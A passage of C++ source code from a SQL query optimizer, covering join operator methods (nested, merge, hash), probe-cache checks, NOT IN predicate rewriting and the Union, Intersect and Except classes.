GroupAttributes *grpAttr0 = child(0).getGroupAttr(); GroupAttributes *grpAttr1 = child(1).getGroupAttr(); GroupAnalysis *grpA0 = grpAttr0->getGroupAnalysis(); GroupAnalysis *grpA1 = grpAttr1->getGroupAnalysis(); // is left child guaranteed small? NABoolean leftIsSmall = FALSE; Cardinality minLeft, maxLeft; if (grpAttr0->hasCardConstraint(minLeft,maxLeft) AND maxLeft <= ActiveSchemaDB()->getDefaults().getAsLong (SAP_TUPLELIST_SIZE_THRESHOLD)) { leftIsSmall = TRUE; } // is right a single table? FileScan *rScan = NULL; NABoolean rightIsTable = pws->getScanLeaf(1, planNumber, rScan); // is right table small? NABoolean isSmallTable = grpAttr1->getResultCardinalityForEmptyInput() <= ActiveSchemaDB()->getDefaults().getAsLong (SAP_KEY_NJ_TABLE_SIZE_THRESHOLD); // prefer this nested_join iff all above conditions are met if (leftIsSmall && rightIsTable && isSmallTable && rScan) { // is predicate on unique key or prefix key? NABoolean hasUniqKeyPred = FALSE; NABoolean hasPrefixKeyPred = FALSE; const SearchKey *sKey = rScan->getSearchKey(); if (sKey) { hasUniqKeyPred = sKey->isUnique(); // TBD: check if key prefix selects few or many rows hasPrefixKeyPred = sKey->getKeyPredicates().entries() > 0; } // TBD: take care of MDAM case // push priority by 2 if it has a unique key predicate if (hasUniqKeyPred) result.incrementLevels(2,0); // push priority by 1 if it has a prefix key predicate else if (hasPrefixKeyPred) result.incrementLevels(1,0); } } return result; } // ----------------------------------------------------------------------- // member functions for class NestedJoinFlow // ----------------------------------------------------------------------- RelExpr * NestedJoinFlow::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { NestedJoinFlow *result; if (derivedNode == NULL) { result = new (outHeap) NestedJoinFlow(NULL, NULL, NULL, NULL, outHeap); } else result = (NestedJoinFlow*)derivedNode; result->sendEODtoTgt_ = sendEODtoTgt_; return NestedJoin::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class NestedJoin // ----------------------------------------------------------------------- NABoolean NestedJoin::isLogical() const {return FALSE;} NABoolean NestedJoin::isPhysical() const {return TRUE;} const NAString NestedJoin::getText() const { switch (getOperatorType()) { case REL_NESTED_JOIN: return "nested_join"; case REL_LEFT_NESTED_JOIN: return "left_nested_join"; case REL_NESTED_SEMIJOIN: return "nested_semi_join"; case REL_NESTED_ANTI_SEMIJOIN: return "nested_anti_semi_join"; case REL_NESTED_JOIN_FLOW: return "tuple_flow"; default: return "UNKNOWN??"; } // switch } // NestedJoin::getText() RelExpr * NestedJoin::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) { result = new (outHeap) NestedJoin(NULL, NULL, getOperatorType(), outHeap); } else result = derivedNode; return Join::copyTopNode(result, outHeap); } NABoolean NestedJoin::allPartitionsProbed() { return TRUE;//all partitions probed } // Conditions to check before applying the nested join probing cache: // 1. The right child has a cardinality constraint of at most one row, // or else the join is a semi-join or anti-semi-join. // 2. The right child's characteristic inputs are not unique for every // request (with exceptions, see below). // 3. The nested join is not a NestedJoinFlow. // 4. The right child does not contain any IUD operations. // 5. The nested join's GroupAttributes do not include embedded IUD. // 6. The execution location is not in DP2. // 7. The nested join cache feature is not suppressed by a default. // 8. The right child does not contain non-deterministic UDRs NABoolean NestedJoin::isProbeCacheApplicable(PlanExecutionEnum loc) const { NABoolean result = FALSE; GroupAttributes &rightGA = *child(1).getGroupAttr(); NABoolean probeIsUnique = rightGA.isUnique(rightGA.getCharacteristicInputs()); if ( !probeIsUnique ) { // dig deep into the right child to see if the searchKey associated with the // only Scan node is unique. If it is unique, we also declare the probe is // unique (i.e., for each probe, there is at most one row returned). The // probe uniqueness property check is for the current implementation in executor // where only one entry per probe in the hash table in probe cache is allocated. RelExpr *childExpr = child(1); // skip over Exchange nodes while (childExpr && (childExpr->getOperator() == REL_EXCHANGE)) childExpr = childExpr->child(0); if (childExpr) { OperatorTypeEnum x = childExpr->getOperator(); if (x == REL_HBASE_ACCESS || x == REL_HBASE_COPROC_AGGR) { HbaseAccess *hbscan = (HbaseAccess*)childExpr; const SearchKey *skey = hbscan->getSearchKey(); if (skey && skey->isUnique()) probeIsUnique = TRUE; } } } NABoolean isTypeOfSemiJoin = isSemiJoin() || isAntiSemiJoin(); if ((probeIsUnique || isTypeOfSemiJoin) && (getOperatorType() != REL_NESTED_JOIN_FLOW) && (isTSJForWrite() == FALSE ) && (getGroupAttr()-> isEmbeddedUpdateOrDelete() == FALSE ) && loc != EXECUTE_IN_DP2 && (CmpCommon::getDefault(NESTED_JOIN_CACHE) != DF_OFF) && (rightGA.getHasNonDeterministicUDRs() == FALSE)) { if (! rowsFromRightHaveUniqueMatch()) { // big if passed and we have a chance of duplicate probes from the left result = TRUE; } else { // If left probes are unique, there isn't a reason for a probe // cache. However, we might be able to pull up some predicate from // the right into the ProbeCache, which might give us non-unique // probes. The code below targets a specific case (ALM 4783): // // NestedJoin // / \ // Aggregate (one equi-join pred is a HAVING pred) // // We can't detect this in the optimizer (where the nested join // may point to a filter or a MEMO group), but that's fine, since // we don't really want to give this unusual case a cost advantage. RelExpr *childExpr = child(1); // skip over Exchange and MapValueIds nodes while (childExpr && (childExpr->getOperator() == REL_EXCHANGE || childExpr->getOperator() == REL_MAP_VALUEIDS)) childExpr = childExpr->child(0); if (childExpr && childExpr->getOperator().match(REL_ANY_GROUP) && CmpCommon::getDefault(NESTED_JOIN_CACHE_PREDS) != DF_OFF) { GroupByAgg *childGB = (GroupByAgg *) childExpr; if (childGB->groupExpr().isEmpty() && ! childGB->selectionPred().isEmpty()) // This is a scalar aggregate with a HAVING predicate, // at least we know that there is a reasonable chance that // we can pull up a HAVING predicate into the probe cache // in method GroupByAgg::tryToPullUpPredicatesInPreCodeGen() result = TRUE; } } } return result; } // ----------------------------------------------------------------------- // member functions for class MergeJoin // ----------------------------------------------------------------------- NABoolean MergeJoin::isLogical() const {return FALSE;} NABoolean MergeJoin::isPhysical() const {return TRUE;} const NAString MergeJoin::getText() const { switch (getOperatorType()) { case REL_MERGE_JOIN: return "merge_join"; case REL_LEFT_MERGE_JOIN: return "left_merge_join"; case REL_MERGE_SEMIJOIN: return "merge_semi_join"; case REL_MERGE_ANTI_SEMIJOIN: return "merge_anti_semi_join"; default: return "UNKNOWN merge join??"; } // switch } // MergeJoin::getText() RelExpr * MergeJoin::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) MergeJoin(NULL, NULL, getOperatorType(), NULL, outHeap); else result = derivedNode; return Join::copyTopNode(result, outHeap); } void MergeJoin::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { xlist.insert(orderedMJPreds_.rebuildExprTree()); llist.insert("merge_join_predicate"); Join::addLocalExpr(xlist,llist); } PlanPriority MergeJoin::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty(); Lng32 degreeOfParallelism = spp->getCountOfPartitions(); double val = CURRSTMT_OPTDEFAULTS->riskPremiumMJ(); if (degreeOfParallelism <= 1) { // serial plans are risky. exact an insurance premium from serial plans. val *= CURRSTMT_OPTDEFAULTS->riskPremiumSerial(); } CostScalar premium(val); PlanPriority result(0, 0, premium); // For the option of Max Degree of Parallelism we can either use the // value set in comp_int_9 (if positive) or we use the number of CPUs // if the CQD is set to -1, or feature is disabled if CQD is 0 (default). Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9); if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) ) { // if CQD is set to -1 this mean use the number of CPUs maxDegree = spp->getCurrentCountOfCPUs(); } if (maxDegree > 1) // CQD set to 0 means feature is OFF { if (degreeOfParallelism < maxDegree) result.incrementLevels(0,-10); // need to replace with constant } return result; } // ----------------------------------------------------------------------- // member functions for class HashJoin // ----------------------------------------------------------------------- NABoolean HashJoin::isLogical() const { return FALSE; } NABoolean HashJoin::isPhysical() const { return TRUE; } const NAString HashJoin::getText() const { switch (getOperatorType()) { case REL_HASH_JOIN: return "hash_join"; case REL_LEFT_HASH_JOIN: return "left_hash_join"; case REL_HASH_SEMIJOIN: return "semi_join"; case REL_HASH_ANTI_SEMIJOIN: return "hash_anti_semi_join"; case REL_HYBRID_HASH_JOIN: { if(((HashJoin *)this)->isOrderedCrossProduct()) return "ordered_cross_product"; else return "hybrid_hash_join"; } case REL_LEFT_HYBRID_HASH_JOIN: return "left_hybrid_hash_join"; case REL_FULL_HYBRID_HASH_JOIN: return "full_hybrid_hash_join"; case REL_HYBRID_HASH_SEMIJOIN: return "hybrid_hash_semi_join"; case REL_HYBRID_HASH_ANTI_SEMIJOIN: return "hybrid_hash_anti_semi_join"; case REL_ORDERED_HASH_JOIN: { if (getEquiJoinPredicates().isEmpty()) return "ordered_cross_product"; else return "ordered_hash_join"; } case REL_LEFT_ORDERED_HASH_JOIN: return "left_ordered_hash_join"; case REL_ORDERED_HASH_SEMIJOIN: return "ordered_hash_semi_join"; case REL_ORDERED_HASH_ANTI_SEMIJOIN: return "ordered_hash_anti_semi_join"; default: return "UNKNOWN hash join??"; } // switch } // HashJoin::getText() RelExpr * HashJoin::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) { result = new (outHeap) HashJoin(NULL, NULL, getOperatorType(), NULL, outHeap); ((HashJoin *)result)->setIsOrderedCrossProduct(isOrderedCrossProduct()); ((HashJoin *)result)->setReuse(isReuse()); ((HashJoin *)result)->setNoOverflow(isNoOverflow()); } else result = derivedNode; ((HashJoin*)result)->isNotInSubqTransform_ = isNotInSubqTransform_; ((HashJoin*)result)->requireOneBroadcast_ = requireOneBroadcast_; ((HashJoin*)result)->innerAccessOnePartition_ = innerAccessOnePartition_; return Join::copyTopNode(result, outHeap); } PlanPriority HashJoin::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty(); Lng32 degreeOfParallelism = spp->getCountOfPartitions(); double val = 1; if (degreeOfParallelism <= 1 && getInnerAccessOnePartition() == FALSE ) { // serial plans are risky. exact an insurance premium from serial plans. // The exception is when only one partition is accessed. val = CURRSTMT_OPTDEFAULTS->riskPremiumSerial(); } CostScalar premium(val); PlanPriority result(0, 0, premium); if (QueryAnalysis::Instance() AND QueryAnalysis::Instance()->optimizeForFirstNRows()) result.incrementLevels(HASH_JOIN_FIRST_N_PRIORITY,0); // For the option of Max Degree of Parallelism we can either use the // value set in comp_int_9 (if positive) or we use the number of CPUs // if the CQD is set to -1, or feature is disabled if CQD is 0 (default). Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9); if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) ) { // if CQD is set to -1 this mean use the number of CPUs maxDegree = spp->getCurrentCountOfCPUs(); } if (maxDegree > 1) // CQD set to 0 means feature is OFF { if (degreeOfParallelism < maxDegree) result.incrementLevels(0,-10); // need to replace with constant } return result; } void HashJoin::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (NOT getEquiJoinPredicates().isEmpty()) { xlist.insert(getEquiJoinPredicates().rebuildExprTree()); llist.insert("hash_join_predicates"); } if (NOT valuesGivenToChild_.isEmpty()) { xlist.insert(valuesGivenToChild_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("reuse_comparison_values"); } if (NOT checkInnerNullExpr_.isEmpty()) { xlist.insert(checkInnerNullExpr_.rebuildExprTree()); llist.insert("check_inner_null_expr"); } if (NOT checkOuterNullExpr_.isEmpty()) { xlist.insert(checkOuterNullExpr_.rebuildExprTree()); llist.insert("check_outer_null_expr"); } Join::addLocalExpr(xlist,llist); } void HashJoin::resolveSingleColNotInPredicate() { if (!isAntiSemiJoin() || !isHashJoin()) { return; } ValueIdSet jPred = joinPred(); short notinCount=0; for ( ValueId valId = jPred.init(); jPred.next(valId); jPred.advance(valId)) { ItemExpr * itmExpr = valId.getItemExpr(); if (itmExpr->getOperatorType() == ITM_NOT_IN) { if (((NotIn*)itmExpr)->getEquivEquiPredicate() == NULL_VALUE_ID) { ((NotIn*)itmExpr)->cacheEquivEquiPredicate(); } // use cached value ids equiJoinPredicates() += ((NotIn*)itmExpr)->getEquivEquiPredicate(); joinPred() -=valId; joinPred() += ((NotIn*)itmExpr)->getEquivEquiPredicate(); notinCount++; setIsNotInSubqTransform(TRUE); setRequireOneBroadcast(((NotIn*)itmExpr)->getIsOneInnerBroadcastRequired()); } } DCMPASSERT(notinCount <=1); }//void HashJoin::resolveSingleColNotInPredicate() void Join::resolveSingleColNotInPredicate() { // applies only to anti_semi_joins if (!isAntiSemiJoin()) { return; } short notinCount = 0; ValueIdSet jPred = joinPred(); for ( ValueId valId = jPred.init(); jPred.next(valId); jPred.advance(valId)) { ItemExpr * itmExpr = valId.getItemExpr(); if (itmExpr->getOperatorType() == ITM_NOT_IN) { if (((NotIn*)itmExpr)->getEquivNonEquiPredicate() == NULL_VALUE_ID ) { ((NotIn*)itmExpr)->cacheEquivNonEquiPredicate(); } //use cached valueids joinPred() -= valId; joinPred() += ((NotIn*)itmExpr)->getEquivNonEquiPredicate(); notinCount++; } } DCMPASSERT(notinCount <=1); }//void Join::resolveSingleColNotInPredicate() // Join::rewriteNotInPredicate() // is method is called right after the predicates are pushed down and // the goal is to make sure that only the NotIn predicate is present. // in any other preduicate exist besides the NotIn Predicate than we can not // optimize the hash anti semi join when the outer column is nullable and may // have null values void Join::rewriteNotInPredicate() { // applies only to anti_semi_joins if (!isAntiSemiJoin()) { return; } ValueIdSet jPred = joinPred(); ItemExpr * notinExpr=NULL; NABoolean otherPredicatesExist = FALSE; for ( ValueId valId = jPred.init(); jPred.next(valId); jPred.advance(valId)) { ItemExpr * itmExpr = valId.getItemExpr(); if (itmExpr->getOperatorType() != ITM_NOT_IN) { otherPredicatesExist = TRUE; } else { // assert if we already encoutered a not in DCMPASSERT(notinExpr == NULL); notinExpr = itmExpr; } } if (notinExpr) { //single column DCMPASSERT (notinExpr->child(0)->getOperatorType() != ITM_ITEM_LIST); const NAType &outerType = notinExpr->child(0)->getValueId().getType(); GroupAttributes * leftChildGrpAttr = child(0).getGroupAttr(); GroupAttributes * rightChildGrpAttr = child(1).getGroupAttr(); const ValueIdSet &inputs = getGroupAttr()->getCharacteristicInputs(); ValueIdSet refs; ValueId valId = notinExpr->getValueId(); if ((outerType.supportsSQLnull() && !((NotIn*)notinExpr)->getOuterNullFilteringDetected() && otherPredicatesExist) || //fix for solution Id:10-100331-9194 //select count(*) from h2_data_1k_37 where col_lar2 <> all (select col_id from //h2_data_1k_37 where col_id=100) ; //NotIn(VEGRef(col_lar2),VEGRef(col_id=100)) is in the join prdicate and in t he characteristc //outputs of the child. changing it to euipredicate may lead to wrong results //the below code will change the NotIn(a,b) predicate to NOT(a<>B is true) when the predicate is covered //by one of of children leftChildGrpAttr->covers(valId, inputs, refs) || rightChildGrpAttr->covers(valId, inputs, refs)) { ValueId tmpId = ((NotIn *)notinExpr)->createEquivNonEquiPredicate(); ItemExpr * tmpItemExpr = tmpId.getItemExpr(); valId.replaceItemExpr(tmpItemExpr); } } }//Join::rewriteNotInPredicate() // Join::rewriteNotInPredicate( ValueIdSet & origVidSet, ValueIdSet & newVidSet) // if both the outer and the inner columns are not nullable or are nullable but // have no NULL values then the NotIn Predicate is changed to an equi-predicate. // otherwise the NotIn predicate is not changed and the optimizer will decide what // to do with it // this method is called right after the pull up of the predicates in join::transformNode() // in the case of anti semi join the inner predicates are pulled and added to join pred // and the outer predicates are pulled and added to selectionPredicates // When we look for outer NUll filetering predicates we look in the selection predocates // and when we look inner NULL filtering predicates we look in the join predicates void Join::rewriteNotInPredicate( ValueIdSet & origVidSet, ValueIdSet & newVidSet) { // applies only to anti_semi_joins if (!isAntiSemiJoin()) { return; } ValueIdSet jPred = joinPred(); ValueIdSet selPred = selectionPred(); short notinCount = 0; for ( ValueId valId = joinPred().init(); joinPred().next(valId); joinPred().advance(valId)) { ItemExpr * itmExpr = valId.getItemExpr(); if (itmExpr->getOperatorType() == ITM_NOT_IN) { //single column if (itmExpr->child(0)->getOperatorType() != ITM_ITEM_LIST) { const NAType &innerType = itmExpr->child(1)->getValueId().getType(); const NAType &outerType = itmExpr->child(0)->getValueId().getType(); selPred -= valId; jPred -= valId; NABoolean child0IsNotNullable = selPred.isNotNullable(itmExpr->child(0)) ; NABoolean child1IsNotNullable = jPred.isNotNullable(itmExpr->child(1)) ; if ((!innerType.supportsSQLnull() || child1IsNotNullable) && (!outerType.supportsSQLnull() || child0IsNotNullable) ) { origVidSet += valId; // we can change the not in predicate to an equi-predicate in this case newVidSet += ((NotIn *)itmExpr)->createEquivEquiPredicate(); } else { // outer refrences case are not handled by optimization ValueIdSet rightSideofPred; ValueIdSet tempSet; rightSideofPred.insert(itmExpr->child(1)->getValueId()); rightSideofPred.getReferencedPredicates(child(0)->getGroupAttr()->getCharacteristicOutputs(), tempSet) ; if (!tempSet.isEmpty()) { origVidSet += valId; // we can change the not in predicate to an equi-predicate in this case newVidSet += ((NotIn *)itmExpr)->createEquivNonEquiPredicate(); } else { if (CmpCommon::getDefault(NOT_IN_OUTER_OPTIMIZATION) == DF_OFF) { //NOT_IN_OUTER_OPTIMIZATION == OFF ==> if outer is nullable and may have NULL values // change to Non equi-predicate here if ( outerType.supportsSQLnull() && !child0IsNotNullable) { origVidSet += valId; // we can change the not in predicate to an equi-predicate in this case newVidSet += ((NotIn *)itmExpr)->createEquivNonEquiPredicate(); } } else { // case where outer or inner columns (or both) is nullable and may have NULL values // optimizer will decide depending on the type of join // hash join ==> equi-predicate with cancel expression when inner is nullbale // ==> filter to filter out NULL values coming from outer side // ==> when inner is not empty // ==> NUILL values coming from outer side are not filtered out when // ==> inner is empty // non hash join ==> Non equi-predicate if (child0IsNotNullable) { ((NotIn*)itmExpr)->setOuterNullFilteringDetected(TRUE); } if (child1IsNotNullable) { ((NotIn*)itmExpr)->setInnerNullFilteringDetected(TRUE); } } } } } else { ValueIdSet predSet ; //ValueIdSet jPreds; //ValueIdSet selPred; //jPreds = joinPred(); //selPred = selectionPred(); predSet = NotIn::rewriteMultiColNotInPredicate( valId, joinPred(), selectionPred()); DCMPASSERT(predSet.entries() >0); origVidSet += valId; newVidSet += predSet; } notinCount++; }//if (itmExpr->getOperatorType() == ITM_NOT_IN) } DCMPASSERT(notinCount <=1); }//void Join::rewriteNotInPredicate() // ----------------------------------------------------------------------- // member functions for class Intersect // ----------------------------------------------------------------------- Intersect::Intersect(RelExpr *leftChild, RelExpr *rightChild) : RelExpr(REL_INTERSECT, leftChild, rightChild) { setNonCacheable(); } Intersect::~Intersect() {} Int32 Intersect::getArity() const { return 2; } const NAString Intersect::getText() const { return "intersect"; } // ----------------------------------------------------------------------- // // member functions for class Except // // ----------------------------------------------------------------------- Except::Except(RelExpr *leftChild, RelExpr *rightChild) : RelExpr(REL_EXCEPT, leftChild, rightChild) { setNonCacheable(); } Except::~Except() {} Int32 Except::getArity() const { return 2; } const NAString Except::getText() const { return "except"; } // ----------------------------------------------------------------------- // member functions for class Union // ----------------------------------------------------------------------- Union::Union(RelExpr *leftChild, RelExpr *rightChild, UnionMap *unionMap, ItemExpr *condExpr, OperatorTypeEnum otype, CollHeap *oHeap, NABoolean sysGenerated, NABoolean mayBeCacheable ) : RelExpr(otype, leftChild, rightChild, oHeap), condExprTree_(condExpr) ,trigExceptExprTree_(NULL) ,previousIF_(NULL) ,flags_(0) ,leftList_(NULL) ,rightList_(NULL) ,currentChild_(-1) ,alternateRightChildOrderExprTree_(NULL) //++MV ,isSystemGenerated_(sysGenerated) ,isSerialUnion_(FALSE) ,variablesSet_(oHeap) { if ( NOT mayBeCacheable ) setNonCacheable(); if (unionMap != NULL) { unionMap_ = unionMap; unionMap_->count_++; } else unionMap_ = new (oHeap) UnionMap; condExpr_.clear(); trigExceptExpr_.clear(); alternateRightChildOrderExpr_.clear(); //++MV variablesSet_.clear(); controlFlags_ = 0; //++ Triggers - } Union::~Union() { if (unionMap_->count_ == 0) delete unionMap_;} Int32 Union::getArity() const { return 2; } void Union::rewriteUnionExpr(const ValueIdSet &unionExpr, ValueIdSet &leftExpr, ValueIdSet &rightExpr) const { // walk the original selection predicates and rewrite them in terms // of the mapped value ids of the union's inputs for (ValueId x = unionExpr.init(); unionExpr.next(x); unionExpr.advance(x)) { ValueId newLeftExpr = x.getItemExpr()->mapAndRewrite(getLeftMap(),TRUE); ValueId newRightExpr = x.getItemExpr()->mapAndRewrite(getRightMap(),TRUE); leftExpr += newLeftExpr; rightExpr += newRightExpr; } } // Union::rewriteExprs() void Union::pushdownCoveredExpr(const ValueIdSet & outputExpr, const ValueIdSet & newExternalInputs, ValueIdSet & predicatesOnParent, const ValueIdSet * setOfValuesReqdByParent, Lng32 // childIndex ignored ) { ValueIdSet resultSet = outputExpr; if (setOfValuesReqdByParent) resultSet += *setOfValuesReqdByParent; resultSet += getGroupAttr()->getCharacteristicInputs(); // alternateRightChildOrderExpr expressions should not be pushed down resultSet.insertList(alternateRightChildOrderExpr()); // ++MV // --------------------------------------------------------------------- // Not all the output columns from the union may be needed. // Map the required input list to the corresponding left // and right required outputs list // --------------------------------------------------------------------- ValueIdSet valuesRequiredFromLeft, valuesRequiredFromRight; rewriteUnionExpr(resultSet, valuesRequiredFromLeft, valuesRequiredFromRight); // --------------------------------------------------------------------- // Rewrite selectionPred() // --------------------------------------------------------------------- ValueIdSet leftPred, rightPred, emptySet; rewriteUnionExpr(predicatesOnParent, leftPred, rightPred); // push the left predicates to the left subtree // empty set for the first argument indicates that there are no // non-essential outputs, (in other words, outputs that are // simply passed through) RelExpr::pushdownCoveredExpr(emptySet, newExternalInputs, leftPred, &valuesRequiredFromLeft, 0 ); // push the right predicates to the right subtree RelExpr::pushdownCoveredExpr(emptySet, newExternalInputs, rightPred, &valuesRequiredFromRight, 1 ); // Verify that all the predicates were pushed leftPred -= child(0)->selectionPred(); CMPASSERT( leftPred.isEmpty() ); rightPred -= child(1)->selectionPred(); CMPASSERT( rightPred.isEmpty() ); // All the predicates have been pushed down to the children. predicatesOnParent.clear(); } // Union::pushdownCoveredExpr void Union::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // // The output of the union is defined by the ValueIdUnion // expressions that are maintained in the colMapTable_. // Lng32 ne = unionMap_->colMapTable_.entries(); for (Lng32 index = 0; index < ne; index++) { // Accumulate the ValueIds of the result of the union // in the set provided by the caller. outputValues += ((ValueIdUnion *) (unionMap_->colMapTable_[index].getItemExpr()))->getResult(); } } // Union::getPotentialOutputValues() HashValue Union::topHash() { HashValue result = RelExpr::topHash(); // result ^= colMapTable_; return result; } NABoolean Union::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; Union &o = (Union &) other; if (NOT ((unionMap_ == o.unionMap_) AND (condExpr_ == o.condExpr_) AND (trigExceptExpr_ == o.trigExceptExpr_) AND (alternateRightChildOrderExpr_ == o.alternateRightChildOrderExpr_))) //++MV return FALSE; return TRUE; } RelExpr * Union::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Union *result; if (derivedNode == NULL) result = new (outHeap) Union(NULL, NULL, unionMap_, NULL, getOperatorType(), outHeap); else result = (Union *) derivedNode; if (condExprTree_ != NULL) result->condExprTree_ = condExprTree_->copyTree(outHeap)->castToItemExpr(); if (trigExceptExprTree_ != NULL) result->trigExceptExprTree_ = trigExceptExprTree_->copyTree(outHeap)->castToItemExpr(); //++MV - if (alternateRightChildOrderExprTree_ != NULL) result->alternateRightChildOrderExprTree_ = alternateRightChildOrderExprTree_->copyTree(outHeap)->castToItemExpr(); //--MV - result->condExpr_ = condExpr_; result->trigExceptExpr_ = trigExceptExpr_; result->alternateRightChildOrderExpr_ = alternateRightChildOrderExpr_; result->setUnionFlags(getUnionFlags()); //++Triggers - result->controlFlags_ = controlFlags_; result->isSystemGenerated_ = isSystemGenerated_; if (getSerialUnion()) { result->setSerialUnion(); } return RelExpr::copyTopNode(result, outHeap); } void Union::addValueIdUnion(ValueId vidUnion, CollHeap* heap) { ValueIdUnion *xvid = (ValueIdUnion *) vidUnion.getItemExpr(); CMPASSERT(vidUnion.getItemExpr()->getOperatorType() == ITM_VALUEIDUNION); // This method is only called by the binder when it is first // building the unionMap if(unionMap_->count_ > 1) { unionMap_->count_--; unionMap_ = new (heap) UnionMap; } CMPASSERT(unionMap_->count_ == 1); // add the value id to the list of value ids for ValueIdUnion expressions // and also add entries to the two maps that describe the same information unionMap_->colMapTable_.insert(vidUnion); unionMap_->leftColMap_.addMapEntry(vidUnion,xvid->getLeftSource()); unionMap_->rightColMap_.addMapEntry(vidUnion,xvid->getRightSource()); } //++ Triggers - void Union::setNoOutputs() { CMPASSERT(flags_ == UNION_BLOCKED || flags_ == UNION_ORDERED); controlFlags_ |= NO_OUTPUTS; } void Union::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (condExprTree_ != NULL) { xlist.insert(condExprTree_); llist.insert("condExprTree"); } if (NOT condExpr_.isEmpty()) { xlist.insert(condExpr_.rebuildExprTree()); llist.insert("condExpr"); } if (trigExceptExprTree_ != NULL) { xlist.insert(trigExceptExprTree_); llist.insert("trigExceptExprTree"); } if (NOT trigExceptExpr_.isEmpty()) { xlist.insert(trigExceptExpr_.rebuildExprTree()); llist.insert("trigExceptExpr"); } if (alternateRightChildOrderExprTree_ != NULL) { xlist.insert(alternateRightChildOrderExprTree_); llist.insert("alternateRightChildOrderExprTree"); } if (NOT alternateRightChildOrderExpr_.isEmpty()) { xlist.insert(alternateRightChildOrderExpr_.rebuildExprTree()); llist.insert("alternateRightChildOrderExpr"); } RelExpr::addLocalExpr(xlist,llist); } const NAString Union::getText() const { NAString text; switch (getUnionFlags()) { case UNION_ORDERED : text += "ordered_union"; break; case UNION_BLOCKED : text += "blocked_union"; break; case UNION_COND_UNARY : text += "unary_union"; break; default : text += "merge_union"; break; } if (getOperatorType() == REL_MERGE_UNION) text += " (phys.)"; return text; } ItemExpr *Union::getCondExprTree() { return condExprTree_; } void Union::addCondExprTree(ItemExpr *condExpr) { ExprValueId t = condExprTree_; ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(condExpr); condExprTree_ = t.getPtr(); } ItemExpr *Union::removeCondExprTree() { ItemExpr *result = condExprTree_; condExprTree_ = NULL; return result; } ItemExpr *Union::getTrigExceptExprTree() { return trigExceptExprTree_; } void Union::addTrigExceptExprTree(ItemExpr *trigExceptExpr) { ExprValueId t = trigExceptExprTree_; ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(trigExceptExpr); trigExceptExprTree_ = t.getPtr(); } ItemExpr *Union::removeTrigExceptExprTree() { ItemExpr *result = trigExceptExprTree_; trigExceptExprTree_ = NULL; return result; } // If this Union node is an IF node of a compound statement, this function // returns either the left or right list of value ids associated with the node. // It returns the left one if we are currently visiting the left child. // Otherwise we return the right one. AssignmentStHostVars *Union::getCurrentList(BindWA *bindWA) { if (currentChild_ == 0) { if (!leftList_) { leftList_ = new (bindWA->wHeap()) AssignmentStHostVars(bindWA); } return leftList_; } else { if (!rightList_) { rightList_ = new (bindWA->wHeap()) AssignmentStHostVars(bindWA); } return rightList_; } } // When we are in a CompoundStatement and we have IF statements in it, // we must create a RETDesc for this Union node (which is // actually an IF node). In this function, we create a list of // ValueIdUnion nodes. We figure out which valueids // of the left child must be matched with those of the right child // (for instance, if SET :a appears in both children) and which must // be matched with previously existing valueids (for instance, if // SET :a = ... only appears in one branch, then the ValueIdUnion associated // with that SET statement must reference the value id of :a that existed before // this IF statement). RETDesc * Union::createReturnTable(AssignmentStArea *assignArea, BindWA *bindWA) { AssignmentStHostVars * leftList = leftList_; AssignmentStHostVars * rightList = rightList_; NABoolean foundAMatch = FALSE; AssignmentStHostVars *globalList = assignArea->getAssignmentStHostVars(); NAString const *nameOfLeftVar; RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA); ColRefName *refName = new (bindWA->wHeap()) ColRefName(); AssignmentStHostVars *listOfPreviousIF = NULL; // We find the list of variables of the previous IF node. We will // need to update it since some of its variables may get new value ids // within the IF statement if (previousIF_) { short currentChild = previousIF_->currentChild(); if (currentChild == 0) { listOfPreviousIF = previousIF_->leftList(); } else { listOfPreviousIF = previousIF_->rightList(); } } // Scan the left list and look for matches in the right List while (leftList && (leftList->var())) { foundAMatch = FALSE; nameOfLeftVar = &(leftList->var()->getName()); rightList = rightList_; while (rightList && rightList->var()) { NAString const *nameOfRightVar = &(rightList->var()->getName()); if (*nameOfLeftVar == *nameOfRightVar) { foundAMatch = TRUE; break; } rightList = rightList->next(); } AssignmentStHostVars *ptrLeftVar = globalList->findVar(*nameOfLeftVar); CMPASSERT(ptrLeftVar); // If we found a match, we create a ValueIdUnion node of the paired match; otherwise // we pair the current value id of the variable in question with the value id it // had before the IF statement. If the variable does not have a value id, we bind it. ValueId value ; if (foundAMatch) { value = rightList->currentValueId(); } else { ValueIdList list = ptrLeftVar->valueIds(); if (list.entries() > 0) { value = ptrLeftVar->currentValueId(); } else { // Get a value id for this variable. ItemExpr *expr = ptrLeftVar->var()->bindNode(bindWA); if (bindWA->errStatus()) { return NULL; } value = expr->getValueId(); } } ValueIdUnion *vidUnion = new (bindWA->wHeap()) ValueIdUnion(leftList->currentValueId(), value, NULL_VALUE_ID); vidUnion->bindNode(bindWA); if (bindWA->errStatus()) { delete vidUnion; return NULL; } ValueId valId = vidUnion->getValueId(); addValueIdUnion(valId,bindWA->wHeap()); 